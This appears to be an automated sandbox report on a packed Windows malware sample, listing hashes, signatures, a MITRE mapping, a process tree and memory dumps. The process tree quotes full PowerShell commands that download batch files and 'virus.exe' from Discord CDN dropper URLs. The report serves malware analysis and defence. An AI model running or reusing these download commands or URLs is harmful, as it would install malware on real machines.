d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72

Analysis

max time kernel
51s
max time network
55s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
06-02-2023 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

susvir.exe
Size

66KB
MD5

28df9a92d49e842d38a1714f7a4066f0
SHA1

e747b57bfda77395a30245bb7573c4a1025e3046
SHA256

d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72
SHA512

59b027ac5d29d763888b437339a6484b367fb055be2c182146c49c87ce0a64a8ef21007db41bae6bcf2ebbc434695bdaafc083f3d6878eaf1a7cb476a423652f
SSDEEP

1536:ipfEKNCj6VoJl9Go5K7s4Nu3Am8ryEpdg0IP6nouy8:iVZ/VGS7rN+AFry50Iaout

Score

10^/10

upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
4	1692	powershell.exe
5	1692	powershell.exe
7	1344	powershell.exe
8	1344	powershell.exe
10	860	powershell.exe
11	860	powershell.exe
14	1576	powershell.exe
15	1576	powershell.exe
17	936	powershell.exe
18	936	powershell.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1292-61-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1692	powershell.exe
576	powershell.exe
1344	powershell.exe
1544	powershell.exe
860	powershell.exe
1504	powershell.exe
1576	powershell.exe
776	powershell.exe
936	powershell.exe
832	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	860	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 1296	1292	susvir.exe	27
PID 1292 wrote to memory of 1296	1292	susvir.exe	27
PID 1292 wrote to memory of 1296	1292	susvir.exe	27
PID 1292 wrote to memory of 1296	1292	susvir.exe	27
PID 1296 wrote to memory of 1692	1296	cmd.exe	29
PID 1296 wrote to memory of 1692	1296	cmd.exe	29
PID 1296 wrote to memory of 1692	1296	cmd.exe	29
PID 1296 wrote to memory of 576	1296	cmd.exe	30
PID 1296 wrote to memory of 576	1296	cmd.exe	30
PID 1296 wrote to memory of 576	1296	cmd.exe	30
PID 1296 wrote to memory of 1344	1296	cmd.exe	31
PID 1296 wrote to memory of 1344	1296	cmd.exe	31
PID 1296 wrote to memory of 1344	1296	cmd.exe	31
PID 1296 wrote to memory of 1544	1296	cmd.exe	32
PID 1296 wrote to memory of 1544	1296	cmd.exe	32
PID 1296 wrote to memory of 1544	1296	cmd.exe	32
PID 1296 wrote to memory of 860	1296	cmd.exe	33
PID 1296 wrote to memory of 860	1296	cmd.exe	33
PID 1296 wrote to memory of 860	1296	cmd.exe	33
PID 1296 wrote to memory of 1504	1296	cmd.exe	34
PID 1296 wrote to memory of 1504	1296	cmd.exe	34
PID 1296 wrote to memory of 1504	1296	cmd.exe	34
PID 1296 wrote to memory of 1576	1296	cmd.exe	35
PID 1296 wrote to memory of 1576	1296	cmd.exe	35
PID 1296 wrote to memory of 1576	1296	cmd.exe	35
PID 1296 wrote to memory of 776	1296	cmd.exe	36
PID 1296 wrote to memory of 776	1296	cmd.exe	36
PID 1296 wrote to memory of 776	1296	cmd.exe	36
PID 1296 wrote to memory of 936	1296	cmd.exe	37
PID 1296 wrote to memory of 936	1296	cmd.exe	37
PID 1296 wrote to memory of 936	1296	cmd.exe	37
PID 1296 wrote to memory of 832	1296	cmd.exe	38
PID 1296 wrote to memory of 832	1296	cmd.exe	38
PID 1296 wrote to memory of 832	1296	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\susvir.exe
"C:\Users\Admin\AppData\Local\Temp\susvir.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1018.tmp\1019.tmp\101A.bat C:\Users\Admin\AppData\Local\Temp\susvir.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1018.tmp\1019.tmp\101A.bat

Filesize
18KB

MD5
da14901fbd42e828503cc0f75847af52

SHA1
db49087447161b0fc6ee882dfc6906d1a9d1b96e

SHA256
8c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f

SHA512
8e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2ca70c0e273b724aa499df08f817168e

SHA1
9bf64081e77c5ccedc5183625719a9c3c4df2158

SHA256
7cb43d146a6d2cd0228dfb81044a72c2e52847d73f5159d1c03836c663d1bfc7

SHA512
9e4674e49bf4f39ee342537f38da30a9e2844986e58bdc59db0ebfa28ebfd5b8e89d79deb8e78139b09a2b138ce908a50d8464dba545c5c2d1dc55d6b8abd43b

Download Submit
memory/576-69-0x000007FEF4060000-0x000007FEF4A83000-memory.dmp

Filesize
10.1MB

Download
memory/576-71-0x00000000025C4000-0x00000000025C7000-memory.dmp

Filesize
12KB

Download
memory/576-72-0x00000000025CB000-0x00000000025EA000-memory.dmp

Filesize
124KB

Download
memory/576-70-0x000007FEF3500000-0x000007FEF405D000-memory.dmp

Filesize
11.4MB

Download
memory/776-123-0x000007FEF3500000-0x000007FEF405D000-memory.dmp

Filesize
11.4MB

Download
memory/776-126-0x000000000228B000-0x00000000022AA000-memory.dmp

Filesize
124KB

Download
memory/776-124-0x0000000002284000-0x0000000002287000-memory.dmp

Filesize
12KB

Download
memory/776-125-0x0000000002284000-0x0000000002287000-memory.dmp

Filesize
12KB

Download
memory/776-122-0x000007FEF4060000-0x000007FEF4A83000-memory.dmp

Filesize
10.1MB

Download
memory/832-139-0x000007FEF4060000-0x000007FEF4A83000-memory.dmp

Filesize
10.1MB

Download
memory/832-140-0x000007FEF3500000-0x000007FEF405D000-memory.dmp

Filesize
11.4MB

Download
memory/832-141-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/832-142-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/832-143-0x000000000289B000-0x00000000028BA000-memory.dmp

Filesize
124KB

Download
memory/860-99-0x000000000251B000-0x000000000253A000-memory.dmp

Filesize
124KB

Download
memory/860-101-0x000000000251B000-0x000000000253A000-memory.dmp

Filesize
124KB

Download
memory/860-100-0x0000000002514000-0x0000000002517000-memory.dmp

Filesize
12KB

Download
memory/860-98-0x0000000002514000-0x0000000002517000-memory.dmp

Filesize
12KB

Download
memory/860-97-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmp

Filesize
11.4MB

Download
memory/860-96-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmp

Filesize
10.1MB

Download
memory/936-133-0x000000000294B000-0x000000000296A000-memory.dmp

Filesize
124KB

Download
memory/936-130-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmp

Filesize
10.1MB

Download
memory/936-131-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmp

Filesize
11.4MB

Download
memory/936-132-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/936-134-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/936-135-0x000000000294B000-0x000000000296A000-memory.dmp

Filesize
124KB

Download
memory/1292-61-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1292-54-0x00000000759C1000-0x00000000759C3000-memory.dmp

Filesize
8KB

Download
memory/1344-77-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmp

Filesize
11.4MB

Download
memory/1344-76-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmp

Filesize
10.1MB

Download
memory/1344-79-0x0000000002A64000-0x0000000002A67000-memory.dmp

Filesize
12KB

Download
memory/1344-78-0x000000001B770000-0x000000001BA6F000-memory.dmp

Filesize
3.0MB

Download
memory/1344-82-0x0000000002A6B000-0x0000000002A8A000-memory.dmp

Filesize
124KB

Download
memory/1344-80-0x0000000002A6B000-0x0000000002A8A000-memory.dmp

Filesize
124KB

Download
memory/1344-81-0x0000000002A64000-0x0000000002A67000-memory.dmp

Filesize
12KB

Download
memory/1504-106-0x000007FEF3500000-0x000007FEF405D000-memory.dmp

Filesize
11.4MB

Download
memory/1504-109-0x00000000028AB000-0x00000000028CA000-memory.dmp

Filesize
124KB

Download
memory/1504-108-0x00000000028A4000-0x00000000028A7000-memory.dmp

Filesize
12KB

Download
memory/1504-105-0x000007FEF4060000-0x000007FEF4A83000-memory.dmp

Filesize
10.1MB

Download
memory/1504-107-0x00000000028A4000-0x00000000028A7000-memory.dmp

Filesize
12KB

Download
memory/1544-91-0x000000000265B000-0x000000000267A000-memory.dmp

Filesize
124KB

Download
memory/1544-87-0x000007FEF4060000-0x000007FEF4A83000-memory.dmp

Filesize
10.1MB

Download
memory/1544-88-0x000007FEF3500000-0x000007FEF405D000-memory.dmp

Filesize
11.4MB

Download
memory/1544-89-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/1544-90-0x0000000002654000-0x0000000002657000-memory.dmp

Filesize
12KB

Download
memory/1576-114-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmp

Filesize
11.4MB

Download
memory/1576-115-0x00000000025B4000-0x00000000025B7000-memory.dmp

Filesize
12KB

Download
memory/1576-113-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmp

Filesize
10.1MB

Download
memory/1576-118-0x00000000025BB000-0x00000000025DA000-memory.dmp

Filesize
124KB

Download
memory/1576-117-0x00000000025B4000-0x00000000025B7000-memory.dmp

Filesize
12KB

Download
memory/1576-116-0x00000000025BB000-0x00000000025DA000-memory.dmp

Filesize
124KB

Download
memory/1692-63-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1692-60-0x000007FEF2B60000-0x000007FEF36BD000-memory.dmp

Filesize
11.4MB

Download
memory/1692-62-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download
memory/1692-65-0x00000000027EB000-0x000000000280A000-memory.dmp

Filesize
124KB

Download
memory/1692-59-0x000007FEF36C0000-0x000007FEF40E3000-memory.dmp

Filesize
10.1MB

Download
memory/1692-58-0x000007FEFBA21000-0x000007FEFBA23000-memory.dmp

Filesize
8KB

Download
memory/1692-64-0x00000000027E4000-0x00000000027E7000-memory.dmp

Filesize
12KB

Download